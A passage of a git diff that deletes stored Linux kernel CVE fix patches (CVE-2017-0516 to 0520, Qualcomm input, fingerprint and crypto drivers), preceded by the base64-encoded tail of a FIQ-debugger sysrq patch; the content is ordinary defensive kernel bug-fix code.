kiIGJ0ICAgICAgICAgICAgU3RhY2sgdHJhY2VcbiIKLQkJCQkiIHJlYm9vdCBbPGM+XSAgUmVib290IHdpdGggY29tbWFuZCA8Yz5cbiIKLQkJCQkiIHJlc2V0IFs8Yz5dICAgSGFyZCByZXNldCB3aXRoIGNvbW1hbmQgPGM+XG4iCi0JCQkJIiBpcnFzICAgICAgICAgIEludGVydXB0IHN0YXR1c1xuIgotCQkJCSIga21zZyAgICAgICAgICBLZXJuZWwgbG9nXG4iCi0JCQkJIiB2ZXJzaW9uICAgICAgIEtlcm5lbCB2ZXJzaW9uXG4iKTsKLQlkZWJ1Z19wcmludGYoc3RhdGUsCSIgc2xlZXAgICAgICAgICBBbGxvdyBzbGVlcCB3aGlsZSBpbiBGSVFcbiIKLQkJCQkiIG5vc2xlZXAgICAgICAgRGlzYWJsZSBzbGVlcCB3aGlsZSBpbiBGSVFcbiIKLQkJCQkiIGNvbnNvbGUgICAgICAgU3dpdGNoIHRlcm1pbmFsIHRvIGNvbnNvbGVcbiIKLQkJCQkiIGNwdSAgICAgICAgICAgQ3VycmVudCBDUFVcbiIKLQkJCQkiIGNwdSA8bnVtYmVyPiAgU3dpdGNoIHRvIENQVTxudW1iZXI+XG4iKTsKLQlkZWJ1Z19wcmludGYoc3RhdGUsCSIgcHMgICAgICAgICAgICBQcm9jZXNzIGxpc3RcbiIKLQkJCQkiIHN5c3JxICAgICAgICAgc3lzcnEgb3B0aW9uc1xuIgotCQkJCSIgc3lzcnEgPHBhcmFtPiBFeGVjdXRlIHN5c3JxIHdpdGggPHBhcmFtPlxuIik7CisJZGVidWdfcHJpbnRmKHN0YXRlLAorCQkJIkZJUSBEZWJ1Z2dlciBjb21tYW5kczpcbiIpOworCWlmIChzeXNycV9vbigpKSB7CisJCWRlYnVnX3ByaW50ZihzdGF0ZSwKKwkJCSIgcGMgICAgICAgICAgICBQQyBzdGF0dXNcbiIKKwkJCSIgcmVncyAgICAgICAgICBSZWdpc3RlciBkdW1wXG4iCisJCQkiIGFsbHJlZ3MgICAgICAgRXh0ZW5kZWQgUmVnaXN0ZXIgZHVtcFxuIgorCQkJIiBidCAgICAgICAgICAgIFN0YWNrIHRyYWNlXG4iKTsKKwkJZGVidWdfcHJpbnRmKHN0YXRlLAorCQkJIiByZWJvb3QgWzxjPl0gIFJlYm9vdCB3aXRoIGNvbW1hbmQgPGM+XG4iCisJCQkiIHJlc2V0IFs8Yz5dICAgSGFyZCByZXNldCB3aXRoIGNvbW1hbmQgPGM+XG4iCisJCQkiIGlycXMgICAgICAgICAgSW50ZXJydXB0IHN0YXR1c1xuIgorCQkJIiBrbXNnICAgICAgICAgIEtlcm5lbCBsb2dcbiIKKwkJCSIgdmVyc2lvbiAgICAgICBLZXJuZWwgdmVyc2lvblxuIik7CisJCWRlYnVnX3ByaW50ZihzdGF0ZSwKKwkJCSIgY3B1ICAgICAgICAgICBDdXJyZW50IENQVVxuIgorCQkJIiBjcHUgPG51bWJlcj4gIFN3aXRjaCB0byBDUFU8bnVtYmVyPlxuIgorCQkJIiBzeXNycSAgICAgICAgIHN5c3JxIG9wdGlvbnNcbiIKKwkJCSIgc3lzcnEgPHBhcmFtPiBFeGVjdXRlIHN5c3JxIHdpdGggPHBhcmFtPlxuIik7CisJfSBlbHNlIHsKKwkJZGVidWdfcHJpbnRmKHN0YXRlLAorCQkJIiByZWJvb3QgICAgICAgIFJlYm9vdFxuIgorCQkJIiByZXNldCAgICAgICAgIEhhcmQgcmVzZXRcbiIKKwkJCSIgaXJxcyAgICAgICAgICBJbnRlcnJ1cHQgc3RhdHVzXG4iKTsKKwl9CisJZGVidWdfcHJpbnRmKHN0YXRlLAorCQkJIiBzbGVlcCAgICAgICAgIEFsbG93IHNsZWVwIHdoaWxlIGluIEZJUVxuIgorCQkJIiBub3NsZWVwICAgICAgIERpc2FibGUgc2xlZXAgd2hpbGUgaW4gRklRXG4iCisJCQkiIGNvbnNvbGUgICAgICAgU3dpdGNoIHRlcm1pbmFsIHRvIGNvbnNvbGVcbiIKKwkJCSIgcHMgICAgICAgICAgICBQcm9jZXNzIGxpc3RcbiIpOwogI2lmZGVmIENPTkZJR19LR0RCCi0JZGVidWdfcHJpbnRmKHN0YXRlLAkiIGtnZGIgICAgICAgICAgRW50ZXIga2VybmVsIGRlYnVnZ2VyXG4iKTsKKwlpZiAoZmlxX2tnZGJfZW5hYmxlKSB7CisJCWRlYnVnX3ByaW50ZihzdGF0ZSwKKwkJCSIga2dkYiAgICAgICAgICBFbnRlciBrZXJuZWwgZGVidWdnZXJcbiIpOwogI2VuZGlmCiB9CiAKQEAgLTY1NywxOSArNjczLDI0IEBACiAJaWYgKCFzdHJjbXAoY21kLCAiaGVscCIpIHx8ICFzdHJjbXAoY21kLCAiPyIpKSB7CiAJCWRlYnVnX2hlbHAoc3RhdGUpOwogCX0gZWxzZSBpZiAoIXN0cmNtcChjbWQsICJwYyIpKSB7Ci0JCWRlYnVnX3ByaW50ZihzdGF0ZSwgIiBwYyAlMDh4IGNwc3IgJTA4eCBtb2RlICVzXG4iLAotCQkJcmVnc1sxNV0sIHJlZ3NbMTZdLCBtb2RlX25hbWUocmVnc1sxNl0pKTsKKwkJaWYgKHN5c3JxX29uKCkpCisJCQlkZWJ1Z19wcmludGYoc3RhdGUsICIgcGMgJTA4eCBjcHNyICUwOHggbW9kZSAlc1xuIiwKKwkJCQlyZWdzWzE1XSwgcmVnc1sxNl0sIG1vZGVfbmFtZShyZWdzWzE2XSkpOwogCX0gZWxzZSBpZiAoIXN0cmNtcChjbWQsICJyZWdzIikpIHsKLQkJZHVtcF9yZWdzKHN0YXRlLCByZWdzKTsKKwkJaWYgKHN5c3JxX29uKCkpCisJCQlkdW1wX3JlZ3Moc3RhdGUsIHJlZ3MpOwogCX0gZWxzZSBpZiAoIXN0cmNtcChjbWQsICJhbGxyZWdzIikpIHsKLQkJZHVtcF9hbGxyZWdzKHN0YXRlLCByZWdzKTsKKwkJaWYgKHN5c3JxX29uKCkpCisJCQlkdW1wX2FsbHJlZ3Moc3RhdGUsIHJlZ3MpOwogCX0gZWxzZSBpZiAoIXN0cmNtcChjbWQsICJidCIpKSB7Ci0JCWR1bXBfc3RhY2t0cmFjZShzdGF0ZSwgKHN0cnVjdCBwdF9yZWdzICopcmVncywgMTAwLCBzdmNfc3ApOworCQlpZiAoc3lzcnFfb24oKSkKKwkJCWR1bXBfc3RhY2t0cmFjZShzdGF0ZSwgKHN0cnVjdCBwdF9yZWdzICopcmVncywKKwkJCQkJMTAwLCBzdmNfc3ApOwogCX0gZWxzZSBpZiAoIXN0cm5jbXAoY21kLCAicmVzZXQiLCA1KSkgewogCQljbWQgKz0gNTsKIAkJd2hpbGUgKCpjbWQgPT0gJyAnKQogCQkJY21kKys7Ci0JCWlmICgqY21kKSB7CisJCWlmICgqY21kICYmIHN5c3JxX29uKCkpIHsKIAkJCWNoYXIgdG1wX2NtZFszMl07CiAJCQlzdHJsY3B5KHRtcF9jbWQsIGNtZCwgc2l6ZW9mKHRtcF9jbWQpKTsKIAkJCW1hY2hpbmVfcmVzdGFydCh0bXBfY21kKTsKQEAgLTY3OSw5ICs3MDAsMTIgQEAKIAl9IGVsc2UgaWYgKCFzdHJjbXAoY21kLCAiaXJxcyIpKSB7CiAJCWR1bXBfaXJxcyhzdGF0ZSk7CiAJfSBlbHNlIGlmICghc3RyY21wKGNtZCwgImttc2ciKSkgewotCQlkdW1wX2tlcm5lbF9sb2coc3RhdGUpOworCQlpZiAoc3lzcnFfb24oKSkKKwkJCWR1bXBfa2VybmVsX2xvZyhzdGF0ZSk7CiAJfSBlbHNlIGlmICghc3RyY21wKGNtZCwgInZlcnNpb24iKSkgewotCQlkZWJ1Z19wcmludGYoc3RhdGUsICIlc1xuIiwgbGludXhfYmFubmVyKTsKKwkJaWYgKHN5c3JxX29uKCkpCisJCQlkZWJ1Z19wcmludGYoc3RhdGUsICIlc1xuIiwKKwkJCQkJbGludXhfYmFubmVyKTsKIAl9IGVsc2UgaWYgKCFzdHJjbXAoY21kLCAic2xlZXAiKSkgewogCQlzdGF0ZS0+bm9fc2xlZXAgPSBmYWxzZTsKIAkJZGVidWdfcHJpbnRmKHN0YXRlLCAiZW5hYmxpbmcgc2xlZXBcbiIpOwpAQCAtNjkzLDE0ICs3MTcsMTcgQEAKIAkJZGVidWdfdWFydF9mbHVzaChzdGF0ZSk7CiAJCXN0YXRlLT5jb25zb2xlX2VuYWJsZSA9IHRydWU7CiAJfSBlbHNlIGlmICghc3RyY21wKGNtZCwgImNwdSIpKSB7Ci0JCWRlYnVnX3ByaW50ZihzdGF0ZSwgImNwdSAlZFxuIiwgc3RhdGUtPmN1cnJlbnRfY3B1KTsKLQl9IGVsc2UgaWYgKCFzdHJuY21wKGNtZCwgImNwdSAiLCA0KSkgeworCQlpZiAoc3lzcnFfb24oKSkKKwkJCWRlYnVnX3ByaW50ZihzdGF0ZSwgImNwdSAlZFxuIiwKKwkJCQkJc3RhdGUtPmN1cnJlbnRfY3B1KTsKKwl9IGVsc2UgaWYgKCFzdHJuY21wKGNtZCwgImNwdSAiLCA0KSAmJiBzeXNycV9vbigpKSB7CiAJCXVuc2lnbmVkIGxvbmcgY3B1ID0gMDsKIAkJaWYgKHN0cmljdF9zdHJ0b3VsKGNtZCArIDQsIDEwLCAmY3B1KSA9PSAwKQogCQkJc3dpdGNoX2NwdShzdGF0ZSwgY3B1KTsKIAkJZWxzZQogCQkJZGVidWdfcHJpbnRmKHN0YXRlLCAiaW52YWxpZCBjcHVcbiIpOwotCQlkZWJ1Z19wcmludGYoc3RhdGUsICJjcHUgJWRcbiIsIHN0YXRlLT5jdXJyZW50X2NwdSk7CisJCWRlYnVnX3ByaW50ZihzdGF0ZSwgImNwdSAlZFxuIiwKKwkJCQkgICAgc3RhdGUtPmN1cnJlbnRfY3B1KTsKIAl9IGVsc2UgewogCQlpZiAoc3RhdGUtPmRlYnVnX2J1c3kpIHsKIAkJCWRlYnVnX3ByaW50ZihzdGF0ZSwKZGlmZiAtLWdpdCBhL2RyaXZlcnMvdHR5L3N5c3JxLmMgYi9kcml2ZXJzL3R0eS9zeXNycS5jCmluZGV4IDA1NzI4ODk0Li42ZWZiZmI3IDEwMDY0NAotLS0gYS9kcml2ZXJzL3R0eS9zeXNycS5jCisrKyBiL2RyaXZlcnMvdHR5L3N5c3JxLmMKQEAgLTQ5LDEwICs0OSwxMSBAQAogc3RhdGljIGludCBfX3JlYWRfbW9zdGx5IHN5c3JxX2VuYWJsZWQgPSBTWVNSUV9ERUZBVUxUX0VOQUJMRTsKIHN0YXRpYyBib29sIF9fcmVhZF9tb3N0bHkgc3lzcnFfYWx3YXlzX2VuYWJsZWQ7CiAKLXN0YXRpYyBib29sIHN5c3JxX29uKHZvaWQpCitib29sIHN5c3JxX29uKHZvaWQpCiB7CiAJcmV0dXJuIHN5c3JxX2VuYWJsZWQgfHwgc3lzcnFfYWx3YXlzX2VuYWJsZWQ7CiB9CitFWFBPUlRfU1lNQk9MKHN5c3JxX29uKTsKIAogLyoKICAqIEEgdmFsdWUgb2YgMSBtZWFucyAnYWxsJywgb3RoZXIgbm9uemVybyB2YWx1ZXMgYXJlIGFuIG9wIG1hc2s6CmRpZmYgLS1naXQgYS9pbmNsdWRlL2xpbnV4L3N5c3JxLmggYi9pbmNsdWRlL2xpbnV4L3N5c3JxLmgKaW5kZXggN2ZhZjkzMy4uNWEwYmQ5MyAxMDA2NDQKLS0tIGEvaW5jbHVkZS9saW51eC9zeXNycS5oCisrKyBiL2luY2x1ZGUvbGludXgvc3lzcnEuaApAQCAtNDUsNiArNDUsNyBAQAogICogYXJlIGF2YWlsYWJsZSAtLSBlbHNlIE5VTEwncykuCiAgKi8KIAorYm9vbCBzeXNycV9vbih2b2lkKTsKIHZvaWQgaGFuZGxlX3N5c3JxKGludCBrZXkpOwogdm9pZCBfX2hhbmRsZV9zeXNycShpbnQga2V5LCBib29sIGNoZWNrX21hc2spOwogaW50IHJlZ2lzdGVyX3N5c3JxX2tleShpbnQga2V5LCBzdHJ1Y3Qgc3lzcnFfa2V5X29wICpvcCk7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-0516/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0516/ANY/0001.patch
deleted file mode 100644
index 84d7b87f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0516/ANY/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From 0dba52cf7955306c71fb76d16437d848c953e462 Mon Sep 17 00:00:00 2001
-From: Vevek Venkatesan <vevekv@codeaurora.org>
-Date: Fri, 23 Dec 2016 11:34:32 +0530
-Subject: input: misc: fix heap overflow issue in hbtp_input.c
-
-Add the boundary check for ABS code before setting ABS params,
-to avoid heap overflow.
-
-Change-Id: I6aad9916c92d2f775632406374dbb803063148de
-Signed-off-by: Vevek Venkatesan <vevekv@codeaurora.org>
----
- drivers/input/misc/hbtp_input.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/input/misc/hbtp_input.c b/drivers/input/misc/hbtp_input.c
-index 4c0e9a9..e80afcf 100644
---- a/drivers/input/misc/hbtp_input.c
-+++ b/drivers/input/misc/hbtp_input.c
-@@ -130,9 +130,13 @@ static int hbtp_input_create_input_dev(struct hbtp_input_absinfo *absinfo)
- 	input_mt_init_slots(input_dev, HBTP_MAX_FINGER, 0);
- 	for (i = 0; i <= ABS_MT_LAST - ABS_MT_FIRST; i++) {
- 		abs = absinfo + i;
--		if (abs->active)
--			input_set_abs_params(input_dev, abs->code,
-+		if (abs->active) {
-+			if (abs->code >= 0 && abs->code < ABS_CNT)
-+				input_set_abs_params(input_dev, abs->code,
- 					abs->minimum, abs->maximum, 0, 0);
-+			else
-+				pr_err("%s: ABS code out of bound\n", __func__);
-+		}
- 	}
- 
- 	error = input_register_device(input_dev);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0518/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0518/3.18/0001.patch
deleted file mode 100644
index 3af62a34..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0518/3.18/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 015d1d5dc8c42d6ab92a31b99cd9f089fae1d27e Mon Sep 17 00:00:00 2001
-From: Dennis Cagle <d-cagle@codeaurora.org>
-Date: Fri, 6 Jan 2017 15:50:35 -0800
-Subject: [PATCH] QBT1000: check for null pointer before copying command
-
-A null command buffer will cause a null pointer crash.
-Check for it.
-
-Bug: 32372915
-Bug: 32370896
-CRs-fixed: 1041652, 1081802
-Change-Id: I37a0c8b9fe2c144fb4e75036509bf7ec07604ea7
-Signed-off-by: Lior Barenboim <liorb@codeaurora.org>
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
----
- drivers/soc/qcom/qbt1000.c | 7 +++++++
- 1 file changed, 7 insertions(+)
- mode change 100644 => 100755 drivers/soc/qcom/qbt1000.c
-
-diff --git a/drivers/soc/qcom/qbt1000.c b/drivers/soc/qcom/qbt1000.c
-old mode 100644
-new mode 100755
-index 135e2b834db30..101fcedd1f2c0
---- a/drivers/soc/qcom/qbt1000.c
-+++ b/drivers/soc/qcom/qbt1000.c
-@@ -862,6 +862,13 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		if (rc != 0)
- 			goto end;
- 
-+		if (!aligned_cmd) {
-+			dev_err(drvdata->dev, "%s: Null command buffer\n",
-+				__func__);
-+			rc = -EINVAL;
-+			goto end;
-+		}
-+
- 		rc = copy_from_user(aligned_cmd, (void __user *)tzcmd.req_buf,
- 				tzcmd.req_buf_len);
- 		if (rc != 0) {
diff --git a/Patches/Linux_CVEs/CVE-2017-0518/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-0518/3.18/0002.patch
deleted file mode 100644
index 8c22345b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0518/3.18/0002.patch
+++ /dev/null
@@ -1,138 +0,0 @@
-From a064a44e03158dbf655a866ba21f5d1baa2dee9e Mon Sep 17 00:00:00 2001
-From: Dennis Cagle <d-cagle@codeaurora.org>
-Date: Fri, 6 Jan 2017 15:28:20 -0800
-Subject: [PATCH] QBT1000: copy qseecom handle to user when loading/unloading
- app
-
-QBT1000 provides IOCTLs for loading and unloading a QSEE app.
-In the input structure for these IOCTLs there is a pointer
-to a qseecom handle which serves as an output parameter for
-the IOCTLs. That is, the given handle (in client address space)
-should be set to a valid handle value on load, and should be set
-to 0 on unload.
-
-The driver was missing a proper copy_to_user() call for this handle,
-which sometimes resulted in unload not setting the handle to 0.
-
-Bug: 32372915
-Bug: 32370896
-CRs-fixed: 1059327
-Change-Id: I31f205afb1f9bf0b6243e3f20f54022525c93b28
-Signed-off-by: Lior Barenboim <liorb@codeaurora.org>
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
----
- drivers/soc/qcom/qbt1000.c | 59 ++++++++++++++++++++++++++++++++++++++++++----
- 1 file changed, 55 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/soc/qcom/qbt1000.c b/drivers/soc/qcom/qbt1000.c
-index 101fcedd1f2c0..961800e2f963f 100755
---- a/drivers/soc/qcom/qbt1000.c
-+++ b/drivers/soc/qcom/qbt1000.c
-@@ -772,6 +772,7 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 	case QBT1000_LOAD_APP:
- 	{
- 		struct qbt1000_app app;
-+		struct qseecom_handle *app_handle;
- 
- 		if (copy_from_user(&app, priv_arg,
- 			sizeof(app)) != 0) {
-@@ -782,8 +783,15 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 			goto end;
- 		}
- 
-+		if (!app.app_handle) {
-+			dev_err(drvdata->dev, "%s: LOAD app_handle is null\n",
-+				__func__);
-+			rc = -EINVAL;
-+			goto end;
-+		}
-+
- 		/* start the TZ app */
--		rc = qseecom_start_app(app.app_handle, app.name, app.size);
-+		rc = qseecom_start_app(&app_handle, app.name, app.size);
- 		if (rc == 0) {
- 			g_app_buf_size = app.size;
- 		} else {
-@@ -792,36 +800,79 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 			goto end;
- 		}
- 
-+		/* copy the app handle to user */
-+		rc = copy_to_user((void __user *)app.app_handle, &app_handle,
-+			sizeof(*app.app_handle));
-+
-+		if (rc != 0) {
-+			dev_err(drvdata->dev,
-+				"%s: Failed copy 2us LOAD rc:%d\n",
-+				 __func__, rc);
-+			rc = -ENOMEM;
-+			goto end;
-+		}
-+
- 		break;
- 	}
- 	case QBT1000_UNLOAD_APP:
- 	{
- 		struct qbt1000_app app;
-+		struct qseecom_handle *app_handle;
- 
- 		if (copy_from_user(&app, priv_arg,
- 			sizeof(app)) != 0) {
- 			rc = -ENOMEM;
- 			dev_err(drvdata->dev,
--				"%s: Failed copy from user space-LOAD\n",
-+				"%s: Failed copy from user space-UNLOAD\n",
- 				 __func__);
- 			goto end;
- 		}
- 
--		/* if the app hasn't been loaded already, return err */
- 		if (!app.app_handle) {
-+			dev_err(drvdata->dev, "%s: UNLOAD app_handle is null\n",
-+				__func__);
-+			rc = -EINVAL;
-+			goto end;
-+		}
-+
-+		rc = copy_from_user(&app_handle, app.app_handle,
-+			sizeof(app_handle));
-+
-+		if (rc != 0) {
-+			dev_err(drvdata->dev,
-+				"%s: Failed copy from user space-UNLOAD handle rc:%d\n",
-+				 __func__, rc);
-+			rc = -ENOMEM;
-+			goto end;
-+		}
-+
-+		/* if the app hasn't been loaded already, return err */
-+		if (!app_handle) {
- 			dev_err(drvdata->dev, "%s: App not loaded\n",
- 				__func__);
- 			rc = -EINVAL;
- 			goto end;
- 		}
- 
--		rc = qseecom_shutdown_app(app.app_handle);
-+		rc = qseecom_shutdown_app(&app_handle);
- 		if (rc != 0) {
- 			dev_err(drvdata->dev, "%s: App failed to shutdown\n",
- 				__func__);
- 			goto end;
- 		}
- 
-+		/* copy the app handle (should be null) to user */
-+		rc = copy_to_user((void __user *)app.app_handle, &app_handle,
-+			sizeof(*app.app_handle));
-+
-+		if (rc != 0) {
-+			dev_err(drvdata->dev,
-+				"%s: Failed copy 2us UNLOAD rc:%d\n",
-+				 __func__, rc);
-+			rc = -ENOMEM;
-+			goto end;
-+		}
-+
- 		break;
- 	}
- 	case QBT1000_SEND_TZCMD:
diff --git a/Patches/Linux_CVEs/CVE-2017-0519/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0519/3.18/0001.patch
deleted file mode 100644
index 87beefe6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0519/3.18/0001.patch
+++ /dev/null
@@ -1,123 +0,0 @@
-From 2f264730e26a73da973c6eef0e1ee252294ec740 Mon Sep 17 00:00:00 2001
-From: Dennis Cagle <d-cagle@codeaurora.org>
-Date: Fri, 6 Jan 2017 15:28:29 -0800
-Subject: [PATCH] soc: qcom: fingerprint: keep QSEE handle in kernel space
-
-Move the QSEE handle from user space to kernel space.
-In addition, fix possible overflow when checking that
-the command and response buffers fit in the shared buffer.
-
-Bug: 32372915
-CRs-fixed: 1086530
-Change-Id: I21b1866546a2825fe348a260c60e341bbe9600ea
-Signed-off-by: Lior Barenboim <liorb@codeaurora.org>
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
----
- drivers/soc/qcom/qbt1000.c | 31 ++++++++++++++++++++++---------
- 1 file changed, 22 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/soc/qcom/qbt1000.c b/drivers/soc/qcom/qbt1000.c
-index 961800e2f963f..f76cf0f45ecaa 100755
---- a/drivers/soc/qcom/qbt1000.c
-+++ b/drivers/soc/qcom/qbt1000.c
-@@ -86,6 +86,7 @@ struct qbt1000_drvdata {
- 	uint32_t	ssc_spi_port;
- 	uint32_t	ssc_spi_port_slave_index;
- 	struct wakeup_source w_lock;
-+	struct qseecom_handle *app_handle;
- };
- #define W_LOCK_DELAY_MS (2000)
- 
-@@ -110,7 +111,7 @@ static int get_cmd_rsp_buffers(struct qseecom_handle *hdl,
- 	*cmd_len = ALIGN(*cmd_len, 64);
- 	*rsp_len = ALIGN(*rsp_len, 64);
- 
--	if ((*rsp_len + *cmd_len) > g_app_buf_size)
-+	if (((uint64_t)*rsp_len + (uint64_t)*cmd_len) > (uint64_t)g_app_buf_size)
- 		return -ENOMEM;
- 
- 	*cmd = hdl->sbuf;
-@@ -790,8 +791,19 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 			goto end;
- 		}
- 
-+		if (drvdata->app_handle) {
-+			dev_err(drvdata->dev, "%s: LOAD app already loaded, unloading first\n",
-+				__func__);
-+			rc = qseecom_shutdown_app(&drvdata->app_handle);
-+			if (rc != 0) {
-+				dev_err(drvdata->dev, "%s: LOAD current app failed to shutdown\n",
-+					  __func__);
-+				goto end;
-+			}
-+		}
-+
- 		/* start the TZ app */
--		rc = qseecom_start_app(&app_handle, app.name, app.size);
-+		rc = qseecom_start_app(&drvdata->app_handle, app.name, app.size);
- 		if (rc == 0) {
- 			g_app_buf_size = app.size;
- 		} else {
-@@ -800,7 +812,8 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 			goto end;
- 		}
- 
--		/* copy the app handle to user */
-+		/* copy a fake app handle to user */
-+		app_handle = drvdata->app_handle ? (struct qseecom_handle *)123456 : 0;
- 		rc = copy_to_user((void __user *)app.app_handle, &app_handle,
- 			sizeof(*app.app_handle));
- 
-@@ -817,7 +830,7 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 	case QBT1000_UNLOAD_APP:
- 	{
- 		struct qbt1000_app app;
--		struct qseecom_handle *app_handle;
-+		struct qseecom_handle *app_handle = 0;
- 
- 		if (copy_from_user(&app, priv_arg,
- 			sizeof(app)) != 0) {
-@@ -847,14 +860,14 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		}
- 
- 		/* if the app hasn't been loaded already, return err */
--		if (!app_handle) {
-+		if (!drvdata->app_handle) {
- 			dev_err(drvdata->dev, "%s: App not loaded\n",
- 				__func__);
- 			rc = -EINVAL;
- 			goto end;
- 		}
- 
--		rc = qseecom_shutdown_app(&app_handle);
-+		rc = qseecom_shutdown_app(&drvdata->app_handle);
- 		if (rc != 0) {
- 			dev_err(drvdata->dev, "%s: App failed to shutdown\n",
- 				__func__);
-@@ -895,7 +908,7 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		}
- 
- 		/* if the app hasn't been loaded already, return err */
--		if (!tzcmd.app_handle) {
-+		if (!drvdata->app_handle) {
- 			dev_err(drvdata->dev, "%s: App not loaded\n",
- 				__func__);
- 			rc = -EINVAL;
-@@ -905,7 +918,7 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		/* init command and response buffers and align lengths */
- 		aligned_cmd_len = tzcmd.req_buf_len;
- 		aligned_rsp_len = tzcmd.rsp_buf_len;
--		rc = get_cmd_rsp_buffers(tzcmd.app_handle,
-+		rc = get_cmd_rsp_buffers(drvdata->app_handle,
- 			(void **)&aligned_cmd,
- 			&aligned_cmd_len,
- 			(void **)&aligned_rsp,
-@@ -930,7 +943,7 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- 		}
- 
- 		/* send cmd to TZ */
--		rc = qseecom_send_command(tzcmd.app_handle,
-+		rc = qseecom_send_command(drvdata->app_handle,
- 			aligned_cmd,
- 			aligned_cmd_len,
- 			aligned_rsp,
diff --git a/Patches/Linux_CVEs/CVE-2017-0520/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0520/ANY/0001.patch
deleted file mode 100644
index 9ab0b23b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0520/ANY/0001.patch
+++ /dev/null
@@ -1,304 +0,0 @@
-From eb2aad752c43f57e88ab9b0c3c5ee7b976ee31dd Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Mon, 31 Oct 2016 15:23:19 -0700
-Subject: msm: crypto: fix issues on digest buf and copy_from_user in qcedev.c
-
-Make the digest length not larger than the size of the buffer
-qcedev_areq.sha_op_req.digest; and use the checked variants of
-the copy_from/to_user() APIs to avoid small race window of their
-unchecked variants.
-
-Change-Id: I3db0c20ac5fa47ed278f3d60368c406f472430c1
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/crypto/msm/qcedev.c | 120 ++++++++++----------------------------------
- 1 file changed, 27 insertions(+), 93 deletions(-)
-
-diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c
-index 1402d3d..433e478 100644
---- a/drivers/crypto/msm/qcedev.c
-+++ b/drivers/crypto/msm/qcedev.c
-@@ -603,7 +603,7 @@ static int qcedev_sha_update_max_xfer(struct qcedev_async_req *qcedev_areq,
- 		while (len > 0) {
- 			user_src =
- 			(void __user *)qcedev_areq->sha_op_req.data[i].vaddr;
--			if (user_src && __copy_from_user(k_src,
-+			if (user_src && copy_from_user(k_src,
- 				(void __user *)user_src,
- 				qcedev_areq->sha_op_req.data[i].len))
- 				return -EFAULT;
-@@ -639,7 +639,7 @@ static int qcedev_sha_update_max_xfer(struct qcedev_async_req *qcedev_areq,
- 
- 	/* Copy data from user src(s) */
- 	user_src = (void __user *)qcedev_areq->sha_op_req.data[0].vaddr;
--	if (user_src && __copy_from_user(k_src,
-+	if (user_src && copy_from_user(k_src,
- 				(void __user *)user_src,
- 				qcedev_areq->sha_op_req.data[0].len)) {
- 		kzfree(k_buf_src);
-@@ -648,7 +648,7 @@ static int qcedev_sha_update_max_xfer(struct qcedev_async_req *qcedev_areq,
- 	k_src += qcedev_areq->sha_op_req.data[0].len;
- 	for (i = 1; i < qcedev_areq->sha_op_req.entries; i++) {
- 		user_src = (void __user *)qcedev_areq->sha_op_req.data[i].vaddr;
--		if (user_src && __copy_from_user(k_src,
-+		if (user_src && copy_from_user(k_src,
- 					(void __user *)user_src,
- 					qcedev_areq->sha_op_req.data[i].len)) {
- 			kzfree(k_buf_src);
-@@ -702,13 +702,6 @@ static int qcedev_sha_update(struct qcedev_async_req *qcedev_areq,
- 		return -EINVAL;
- 	}
- 
--	/* verify address src(s) */
--	for (i = 0; i < qcedev_areq->sha_op_req.entries; i++)
--		if (!access_ok(VERIFY_READ,
--			(void __user *)qcedev_areq->sha_op_req.data[i].vaddr,
--			qcedev_areq->sha_op_req.data[i].len))
--			return -EFAULT;
--
- 	if (qcedev_areq->sha_op_req.data_len > QCE_MAX_OPER_DATA) {
- 
- 		struct	qcedev_sha_op_req *saved_req;
-@@ -868,19 +861,7 @@ static int qcedev_hash_cmac(struct qcedev_async_req *qcedev_areq,
- 
- 	total = qcedev_areq->sha_op_req.data_len;
- 
--	/* verify address src(s) */
--	for (i = 0; i < qcedev_areq->sha_op_req.entries; i++)
--		if (!access_ok(VERIFY_READ,
--			(void __user *)qcedev_areq->sha_op_req.data[i].vaddr,
--			qcedev_areq->sha_op_req.data[i].len))
--			return -EFAULT;
--
--	/* Verify Source Address */
--	if (!access_ok(VERIFY_READ,
--				(void __user *)qcedev_areq->sha_op_req.authkey,
--				qcedev_areq->sha_op_req.authklen))
--			return -EFAULT;
--	if (__copy_from_user(&handle->sha_ctxt.authkey[0],
-+	if (copy_from_user(&handle->sha_ctxt.authkey[0],
- 				(void __user *)qcedev_areq->sha_op_req.authkey,
- 				qcedev_areq->sha_op_req.authklen))
- 		return -EFAULT;
-@@ -900,7 +881,7 @@ static int qcedev_hash_cmac(struct qcedev_async_req *qcedev_areq,
